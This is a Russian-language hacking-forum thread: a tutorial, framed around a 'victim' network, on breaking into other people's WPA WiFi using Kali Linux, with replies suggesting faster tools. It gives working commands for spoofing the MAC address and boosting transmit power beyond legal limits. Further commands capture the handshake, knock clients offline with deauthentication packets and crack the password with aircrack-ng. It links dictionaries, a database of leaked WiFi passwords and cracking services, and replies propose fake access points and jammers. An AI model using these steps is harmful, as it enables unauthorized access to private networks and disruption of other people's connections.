Загрузка...

How professional true hackers hack wifi.

Thread in WiFi created by AIMMISSIE Feb 16, 2020. 2347 views

The poll

Как вам?

Your vote will be publicly visible.
  1. Годно.

    16
    64%
  2. Я говняшка.

    9
    36%
  1. AIMMISSIE
    AIMMISSIE Topic starter Feb 16, 2020 Общение через лс форума. 54 Mar 18, 2019
    Я вас приветствую дорогие повелители своих судеб и просто пользователи форума lolzteam.net! Сегодня вас ждёт замечательная статья о том, как люди получают доступ к вашей Wifi-точке, выводы для защиты, естественно будете делать сами.
    [IMG]

    Для особо ленивых есть сайт с Wifi-точками, и их паролями, проверь! Есть ли там твоя сеть! *Тык*. данные для входа: antichat:antichat.

    Всё что нам нужно - Kali Linux, Wifi-адаптер, компьютер/ноут (заранее исправный), и, конечно, внимательность с прямыми руками!

    Для начала определимся с нашими гаджетами.

    Kali Linux.

    Советую вам использовать кали на флешке, лично я её ношу с собой постоянно, размера в 32-а гб мне хватает с головой. Если поискать, в любом мухосранске можно найти подобную флешку всего за 275-ть деревянных.

    Wifi-адаптер.

    Для постоянной работы, если далее вы хотите заниматься вардрайвингом можно заказать на алике чудо-прибор, собственно, вот ссылка: *Тык*.

    Установка Kali Linux на флешку.
    После проведения обязательной переписи приступаем к установке кали на флешку. Нам нужно скачать образ с оф. сайта кали. *Тык*. (Версия для 64-х битный процов.) В придачу нам пригодится программа "Rufus". Скачиваем здесь - *Тык*.
    У нас есть все ингридиенты для установки, теперь просто запускаем Руфус, вставляем нашу флешку в USB, выбираем образ, нажимаем "Старт", после чего ВЫБИРАЕМ ИМЕННО DD-ОБРАЗ!!!! [IMG]
    По проходу некоторого времени программа сделала свою работу и её можно удалить вместе с образом с нашего ПК.

    Запуск Kali Linux Life с флешки.
    Уже имея вставленную флешку в заднюю панель ПК запускаем наш компутахтер. Заходим в биос, и выбираем приоритет загрузки для нашей загрузочной флешки. После загрузки компьютера мы имеем окошко с выбором запуска. [IMG]

    Естественно, выбираем 1-ю строку, жмакаем "Enter". Для особенно впечатлительных ребят, желающий пользоваться кали на флешке без потери файлов я просто прикреплю эти два видео: *Тык* и *Тык*.

    Начинаем работу над нашим адаптером!

    Изначально нужно увеличить мощность адаптера Wifi.


    Уровень сигнала очень влияет на эффективность нашей с вами атаки на какой либо Wi-FI. Ваш донгл обязан быть чувствительным и слышать слабый сигнал точек доступа и перехватить все хендшейк пакеты. А так же ему нужен хороший передатчик, в другом случае команды деавторизации или ****а WPS-пинов не дойдут до нашего атакуемого. Работая на высокой мощности, адаптер быстро перегревается (особенно в режиме инжекта пакетов), вызывает помехи связи и представляет некоторую опасность для здоровья. Поэтому не ставь сразу 33 dBm. Попробуй начать с 22 и плавно увеличивать значение. Шкала здесь логарифмическая, поэтому прибавка на пару-тройку dBm дает двукратное повышение мощности. По умолчанию все Wi-Fi-модули стартуют на минимальной мощности. В таком режиме они запускаются согласно стандарту ISO 3166, который отражен в базе данных беспроводных устройств. В Linux это wireless regulatory database. В Kali Linux (включая Nethunter) она находится по адресу /lib/crda/regulatory.bin. Этот файл считывает агент центральной базы данных регламентированных настроек (Central Regulatory Domain Agent — CRDA) и отправляет ядру информацию о том, какая мощность допустима для передатчика в данном регионе. Таким образом, в ОС действует общая системная настройка мощности передатчика для любых Wi-Fi-адаптеров на конкретном беспроводном интерфейсе. Иногда для адаптеров задан какой-нибудь код из региона EMEA, где разрешаются только жалкие 100 мВт (20 дБм). Поэтому, подключив любой донгл, ты будешь тщетно слать пакеты "deauth" и пытаться заглушить найденные AP. Мало кто услышит твои 20 дБм, а большая часть наших команд отфильтруется станциями как помехи.
    Нам нужно сменить MAC-адрес адаптера, это делается так:
    Открываем терминал (CTRL+ALT+T);
    macchanger -r wlan0 (-r - рандомный адрес)
    Теперь задаем название региона, в котором разрешены передатчики мощностью 30 дБм или выше. (оставаясь в терминале):
    iw reg set BO (по моей памяти Боливия разрешает использовать диапазон большего уровня, нежели в других странах.)
    iwconfig wlan0 txpower 30 (смена допустимого значения мощности)
    ifconfig wlan0 up (поднимаем диапазон)
    Если у вас ничего не вышло - лучше не ковыряться в настройках, ну, или попробуйте заменить wlan0 на wlan1.

    Включаемся в работу.

    В терминале следуем командам:
    airmon-ng check kill (завершает процессы которые могут помешать вашей работе)
    airmon-ng start wlan0 (запускает работу адаптера)
    airodump-ng wlan0mon (запускает мониторинг)
    На этом моменте выбираем нашу цель, копируем её MAC-адрес и вводим:
    airodump-ng --bssid MAC Wiff-станции(жертвы) --channel 1 -w /root/Desktop/wifi wlan0mon (до команды создайте на рабочем столе файл "wifi", в который и сохранится хендшейк, без этого файла все старания напрасны)
    После команды выше мы ждём хендшейк, но просто так его можно прождать хоть до Китайской Пасхи, поэтому, мы видим клиентов Wifi-точки, их адрес и, также адрес станции.
    Исходя из данных следуем по командам открыв ещё один терминал, не закрывая предыдущий и не его завершая работу:
    aireplay-ng --deauth 20 -a MAC станции -c MAC подключенного клиента wlan0mon
    Буквально через 30-ть секунд хендшейк уже будет у тебя!
    - wpaclean ЗдесьДолжноБытьНазваниеФайлаВКоторомХендшейк ЗдесьДолжноБытьНазваниеФайлаВКоторомБудетЧистыйХендшейк (как вы понимаете, комманда будет очищать наш хендшейк от прочего говна, указываем файлы с расположением (к примеру /root/Desktop/wifi (wifi в данном случае уже выступает как файл))).
    Теперь, мой дорогой друг, мы будем ****ить наш хендшейк.
    aircrack-ng -w ПутьКСловарю -b MAC станции ЧистыйХэндшейк.cap
    Для тебя я подарю словарь, с самыми популярными дефолтными паролями! *Тык*.

    Также можно использовать и сервисы по ****у, к примеру, gpuhash.me (не реклама). *Тык*.
    Вот и подошла моя статья к концу, я надеюсь что она тебе понравится.
    Я также провожу аудит безопасности для сайтов, можешь написать мне в ТГ по этому поводу, или в лс на форуме). Прощай, дорогой читатель, надеюсь, ты дальше будешь с удовольствием читать мои авторские статьи).
     
  2. AIMMISSIE
    AIMMISSIE Topic starter Feb 16, 2020 Общение через лс форума. 54 Mar 18, 2019
    А что ты хотел? Зато информативно и разжёвано.
     
  3. httsmvkcom
    httsmvkcom Mar 31, 2020 Актуальных контактов нет 1354 Mar 27, 2019
    нахуй так ебать мозги себе с airmon-ng когда можно просто заюзать wifite, а хендшейк через hashcat прогнать (что бы быстрее было)
     
    1. AIMMISSIE Topic starter
      httsmvkcom, я предоставил и разжевал метод, выбор за тобой.
  4. 0x1o1l9g9a4
    0x1o1l9g9a4 Apr 26, 2020 Banned 1 Apr 26, 2020
    а не проще поднять фейковую точку доступа и владелец точки сам выдаст тебе пароль?!?!?
     
    1. 0x1o1l9g9a4
      AIMMISSIE, если есть устройства онлайн которые используют вайфай, сразу после деактивации их сразу подключит назад к точке которая именуется так же, и человек вынужден ввести пароль, но в принципе если не горит, то можно тогда играться с хешем
    2. AIMMISSIE Topic starter
      0x1o1l9g9a4, чел, это маленький процент, сейчас новомодные гаджеты скорее всего, подключаются по маку, а не имении USSDI.
    3. clowngoda
      0x1o1l9g9a4, подключение однозначно идёт по MAC сейчас. **** до сих пор актуальный вариант. С упрощением ожидания перехвата хендшейка может помочь WiFi Jammer, потому что Aireplay зачастую надо в 5-6 окнах запускать и может не дать желаемого быстрого результата.
Loading...
Top